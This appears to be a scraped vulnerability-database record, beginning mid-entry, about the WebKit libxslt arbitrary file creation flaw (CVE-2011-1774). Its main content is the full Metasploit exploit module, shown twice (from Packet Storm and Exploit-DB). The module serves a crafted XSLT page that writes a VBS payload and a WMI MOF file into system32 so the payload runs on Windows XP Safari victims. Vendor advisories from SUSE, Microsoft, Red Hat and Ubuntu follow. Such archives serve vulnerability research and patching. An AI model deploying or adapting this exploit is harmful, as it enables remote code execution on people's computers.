Msf::Exploit::WbemExec \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apple Safari Webkit libxslt Arbitrary File Creation', \n'Description' => %q{ \nThis module exploits a file creation vulnerability in the Webkit \nrendering engine. It is possible to redirect the output of a XSLT \ntransformation to an arbitrary file. The content of the created file must be \nASCII or UTF-8. The destination path can be relative or absolute. This module \nhas been tested on Safari and Maxthon. Code execution can be acheived by first \nuploading the payload to the remote machine in VBS format, and then upload a MOF \nfile, which enables Windows Management Instrumentation service to execute the VBS. \n}, \n'License' => MSF_LICENSE, \n'Author' => ['Nicolas Gregoire'], \n'Version' => '$Revision: 13987 $', \n'References' => \n[ \n['CVE', '2011-1774'], \n['OSVDB', '74017'], \n['URL', 'http://lists.apple.com/archives/Security-announce/2011/Jul/msg00002.html'], \n], \n'DefaultOptions' => \n{ \n'InitialAutoRunScript' => 'migrate -f', \n}, \n'Payload' => \n{ \n'Space' => 2048, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n#Windows before Vista \n[ 'Automatic', { } ], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jul 20 2011')) \nend \n \ndef autofilter \nfalse \nend \n \ndef check_dependencies \nuse_zlib \nend \n \ndef on_request_uri(cli, request) \n# Check target before attacking \nagent = request.headers['User-Agent'] \nif agent !~ /Windows NT 5\\.1/ or agent !~ /Safari/ or agent !~ /Version\\/5\\.0\\.\\d/ \nprint_error(\"This target isn't supported: #{agent.to_s}\") \nsend_not_found(cli) \nreturn \nend \n \nurl = \"http://\" \nurl += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] \nurl += \":\" + datastore['SRVPORT'] + get_resource() + \"/\" \n \ncontent = <<-EOS \n<?xml-stylesheet type=\"text/xml\" href=\"#fragment\"?> \n \n<!DOCTYPE doc [ \n<!ATTLIST xsl:stylesheet \nid ID #REQUIRED \n>]> \n<doc> \n \n \n<mof> \n<location><![CDATA[\\\\\\\\.\\\\GLOBALROOT\\\\SystemRoot\\\\system32\\\\wbem\\\\mof\\\\#{@mof_name}]]></location> \n<content><![CDATA[#{@mof_content}]]></content> \n</mof><vbs> \n<location><![CDATA[\\\\\\\\.\\\\GLOBALROOT\\\\SystemRoot\\\\system32\\\\#{@vbs_name}]]></location> \n<content><![CDATA[#{@vbs_content}]]></content> \n</vbs> \n \n \n<xsl:stylesheet id=\"fragment\" version=\"1.0\" \nxmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" \nxmlns:sx=\"http://icl.com/saxon\" \nextension-element-prefixes=\"sx\" \nxmlns=\"http://www.w3.org/1999/xhtml\" > \n<xsl:output method=\"xml\" indent=\"yes\" /> \n \n \n<xsl:template match=\"/\"> \n \n<xsl:variable name=\"moflocation\" select=\"//mof/location/text()\"/> \n<xsl:variable name=\"vbslocation\" select=\"//vbs/location/text()\"/> \n \n<sx:output file=\"{$vbslocation}\" method=\"text\"> \n<xsl:value-of select=\"//vbs/content\"/> \n</sx:output> \n<sx:output file=\"{$moflocation}\" method=\"text\"> \n<xsl:value-of select=\"//mof/content\"/> \n</sx:output> \n \n<html> </html> \n</xsl:template> \n</xsl:stylesheet> \n</doc> \nEOS \n \n#Clear the extra tabs \ncontent = content.gsub(/^\\t\\t/, '') \n \nprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\") \nsend_response(cli, content, {'Content-Type'=>'application/xml'}) \nhandler(cli) \n \nend \n \ndef exploit \n# In order to save binary data to the file system the payload is written to a VBS \n# file and execute it from there via a MOF \n@mof_name = rand_text_alpha(rand(5)+5) + \".mof\" \n@vbs_name = rand_text_alpha(rand(5)+5) + \".vbs\" \n \nprint_status(\"Encoding payload into vbs...\") \npayload = generate_payload_exe \n@vbs_content = Msf::Util::EXE.to_exe_vbs(payload) \n \nprint_status(\"Generating mof file...\") \n@mof_content = generate_mof(@mof_name, @vbs_name) \nsuper \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/105943/safari_xslt_output.rb.txt", "cvss": {"score": 8.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T11:55:38", "bulletinFamily": "unix", "description": "This update of libwebkit fixes:\n\n * CVE-2011-1774: XSLT file creation allowed webpages\n evaluating XSLT code to create files.\n * ZDI-11-139 Webkit Anonymous Frame remote code exec\n", "modified": "2011-08-02T01:08:15", "published": "2011-08-02T01:08:15", "id": "SUSE-SU-2011:0857-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2011-08/msg00000.html", "title": "Security update for libwebkit (important)", "type": "suse", "cvss": {"score": 8.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:COMPLETE/A:COMPLETE/"}}], "msvr": [{"lastseen": "2016-09-04T11:12:56", "bulletinFamily": "software", "description": "#### Executive Summary\n\nMicrosoft is providing notification of the discovery and remediation of a vulnerability affecting Apple Safari version 5.05 and earlier. Microsoft discovered and disclosed the vulnerability under coordinated vulnerability disclosure to the affected vendor, Apple Inc. Apple Inc. has remediated the vulnerability in Safari.\n\nA vulnerability exists in the way Safari handles certain content types. An attacker could exploit this vulnerability to cause Safari to execute script content and disclose potentially sensitive information. An attacker who successfully exploited this vulnerability would gain sensitive information that could be used in further attacks.\n\nMicrosoft Vulnerability Research reported this issue to and coordinated with Apple to ensure remediation of this issue. The vulnerability has been assigned the entry, CVE-2010-1420, in the Common Vulnerabilities and Exposures list. For more information, including information about updates from Apple, see [Apple Safari Security Alerts](<http://support.apple.com/kb/ht4808>).\n\n#### Mitigating Factors\n\n * In a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker's Web site.\n * The vulnerability cannot be exploited automatically through e-mail. For an attack to be successful, an attacker must convince a user to click a link in an e-mail message that takes users to the attacker's Web site.\n", "modified": "2011-08-16T00:00:00", "published": "2011-08-16T00:00:00", "id": "MSVR11-009", "href": "https://technet.microsoft.com/en-us/library/security/msvr11-009", "title": "Vulnerability in Apple Safari Could Allow Information Disclosure", "type": "msvr", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-02T08:58:10", "bulletinFamily": "exploit", "description": "Apple Safari Webkit libxslt Arbitrary File Creation. CVE-2011-1425,CVE-2011-1774. Remote exploit for windows platform", "modified": "2011-10-18T00:00:00", "published": "2011-10-18T00:00:00", "id": "EDB-ID:17993", "href": "https://www.exploit-db.com/exploits/17993/", "type": "exploitdb", "title": "Apple Safari Webkit libxslt Arbitrary File Creation", "sourceData": "##\r\n# $Id: safari_xslt_output.rb 13987 2011-10-18 07:39:50Z sinn3r $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::EXE\r\n\tinclude Msf::Exploit::WbemExec\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Apple Safari Webkit libxslt Arbitrary File Creation',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a file creation vulnerability in the Webkit\r\n\t\t\t\trendering engine. It is possible to redirect the output of a XSLT\r\n\t\t\t\ttransformation to an arbitrary file. The content of the created file must be\r\n\t\t\t\tASCII or UTF-8. The destination path can be relative or absolute. This module\r\n\t\t\t\thas been tested on Safari and Maxthon. Code execution can be acheived by first\r\n\t\t\t\tuploading the payload to the remote machine in VBS format, and then upload a MOF\r\n\t\t\t\tfile, which enables Windows Management Instrumentation service to execute the VBS.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => ['Nicolas Gregoire'],\r\n\t\t\t'Version' => '$Revision: 13987 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2011-1774'],\r\n\t\t\t\t\t['OSVDB', '74017'],\r\n\t\t\t\t\t['URL', 'http://lists.apple.com/archives/Security-announce/2011/Jul/msg00002.html'],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 2048,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t#Windows before Vista\r\n\t\t\t\t\t[ 'Automatic', { } ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Jul 20 2011'))\r\n\tend\r\n\r\n\tdef autofilter\r\n\t\tfalse\r\n\tend\r\n\r\n\tdef check_dependencies\r\n\t\tuse_zlib\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\t# Check target before attacking\r\n\t\tagent = request.headers['User-Agent']\r\n\t\tif agent !~ /Windows NT 5\\.1/ or agent !~ /Safari/ or agent !~ /Version\\/5\\.0\\.\\d/\r\n\t\t\tprint_error(\"This target isn't supported: #{agent.to_s}\")\r\n\t\t\tsend_not_found(cli)\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\turl = \"http://\"\r\n\t\turl += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\r\n\t\turl += \":\" + datastore['SRVPORT'] + get_resource() + \"/\"\r\n\r\n\t\tcontent = <<-EOS\r\n<?xml-stylesheet type=\"text/xml\" href=\"#fragment\"?>\r\n\r\n<!DOCTYPE doc [\r\n <!ATTLIST xsl:stylesheet\r\n id ID #REQUIRED\r\n>]>\r\n<doc>\r\n\r\n\r\n<mof>\r\n\t<location><![CDATA[\\\\\\\\.\\\\GLOBALROOT\\\\SystemRoot\\\\system32\\\\wbem\\\\mof\\\\#{@mof_name}]]></location>\r\n\t<content><![CDATA[#{@mof_content}]]></content>\r\n</mof><vbs>\r\n\t<location><![CDATA[\\\\\\\\.\\\\GLOBALROOT\\\\SystemRoot\\\\system32\\\\#{@vbs_name}]]></location>\r\n\t<content><![CDATA[#{@vbs_content}]]></content>\r\n</vbs>\r\n\r\n\r\n<xsl:stylesheet id=\"fragment\" version=\"1.0\" \r\n xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\"\r\n xmlns:sx=\"http://icl.com/saxon\"\r\n extension-element-prefixes=\"sx\"\r\n xmlns=\"http://www.w3.org/1999/xhtml\" >\r\n<xsl:output method=\"xml\" indent=\"yes\" />\r\n\r\n\r\n<xsl:template match=\"/\">\r\n\t\r\n\t<xsl:variable name=\"moflocation\" select=\"//mof/location/text()\"/>\r\n\t<xsl:variable name=\"vbslocation\" select=\"//vbs/location/text()\"/>\r\n\t\r\n\t<sx:output file=\"{$vbslocation}\" method=\"text\">\r\n\t\t<xsl:value-of select=\"//vbs/content\"/>\r\n\t</sx:output>\r\n\t<sx:output file=\"{$moflocation}\" method=\"text\">\r\n\t\t<xsl:value-of select=\"//mof/content\"/>\r\n\t</sx:output>\r\n\t\r\n\t<html> </html>\r\n</xsl:template>\r\n</xsl:stylesheet>\r\n</doc>\r\n\t\tEOS\r\n\r\n\t\t#Clear the extra tabs\r\n\t\tcontent = content.gsub(/^\\t\\t/, '')\r\n\r\n\t\tprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n\t\tsend_response(cli, content, {'Content-Type'=>'application/xml'})\r\n\t\thandler(cli)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\t\t# In order to save binary data to the file system the payload is written to a VBS\r\n\t\t# file and execute it from there via a MOF\r\n\t\t@mof_name = rand_text_alpha(rand(5)+5) + \".mof\"\r\n\t\t@vbs_name = rand_text_alpha(rand(5)+5) + \".vbs\"\r\n\r\n\t\tprint_status(\"Encoding payload into vbs...\")\r\n\t\tpayload = generate_payload_exe\r\n\t\t@vbs_content = Msf::Util::EXE.to_exe_vbs(payload)\r\n\r\n\t\tprint_status(\"Generating mof file...\")\r\n\t\t@mof_content = generate_mof(@mof_name, @vbs_name)\r\n\t\tsuper\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 8.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17993/"}], "redhat": [{"lastseen": "2019-08-13T18:47:13", "bulletinFamily": "unix", "description": "The libxml2 library is a development toolbox providing the implementation\nof various XML standards. One of those standards is the XML Path Language\n(XPath), which is a language for addressing parts of an XML document.\n\nA heap-based buffer overflow flaw was found in the way libxml2 decoded\nentity references with long names. A remote attacker could provide a\nspecially-crafted XML file that, when opened in an application linked\nagainst libxml2, would cause the application to crash or, potentially,\nexecute arbitrary code with the privileges of the user running the\napplication. (CVE-2011-3919)\n\nAn off-by-one error, leading to a heap-based buffer overflow, was found in\nthe way libxml2 parsed certain XML files. A remote attacker could provide a\nspecially-crafted XML file that, when opened in an application linked\nagainst libxml2, would cause the application to crash or, potentially,\nexecute arbitrary code with the privileges of the user running the\napplication. (CVE-2011-0216)\n\nA flaw was found in the way libxml2 parsed certain XPath expressions. If an\nattacker were able to supply a specially-crafted XML file to an application\nusing libxml2, as well as an XPath expression for that application to run\nagainst the crafted file, it could cause the application to crash.\n(CVE-2011-2834)\n\nNote: Red Hat does not ship any applications that use libxml2 in a way that\nwould allow the CVE-2011-2834 flaw to be exploited; however, third-party\napplications may allow XPath expressions to be passed which could trigger\nthis flaw.\n\nAn out-of-bounds memory read flaw was found in libxml2. A remote attacker\ncould provide a specially-crafted XML file that, when opened in an\napplication linked against libxml2, would cause the application to crash.\n(CVE-2011-3905)\n\nAll users of libxml2 are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The desktop must\nbe restarted (log out, then log back in) for this update to take effect.\n", "modified": "2017-09-08T12:17:23", "published": "2012-01-11T05:00:00", "id": "RHSA-2012:0016", "href": "https://access.redhat.com/errata/RHSA-2012:0016", "type": "redhat", "title": "(RHSA-2012:0016) Important: libxml2 security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2019-05-29T17:22:35", "bulletinFamily": "unix", "description": "It was discovered that libxml2 contained an off by one error. If a user or application linked against libxml2 were tricked into opening a specially crafted XML file, an attacker could cause the application to crash or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2011-0216)\n\nIt was discovered that libxml2 is vulnerable to double-free conditions when parsing certain XML documents. This could allow a remote attacker to cause a denial of service. (CVE-2011-2821, CVE-2011-2834)\n\nIt was discovered that libxml2 did not properly detect end of file when parsing certain XML documents. An attacker could exploit this to crash applications linked against libxml2. (CVE-2011-3905)\n\nIt was discovered that libxml2 did not properly decode entity references with long names. If a user or application linked against libxml2 were tricked into opening a specially crafted XML file, an attacker could cause the application to crash or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2011-3919)", "modified": "2012-01-19T00:00:00", "published": "2012-01-19T00:00:00", "id": "USN-1334-1", "href": "https://usn.ubuntu.com/1334-1/", "title": "libxml2 vulnerabilities", "type": "ubuntu", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}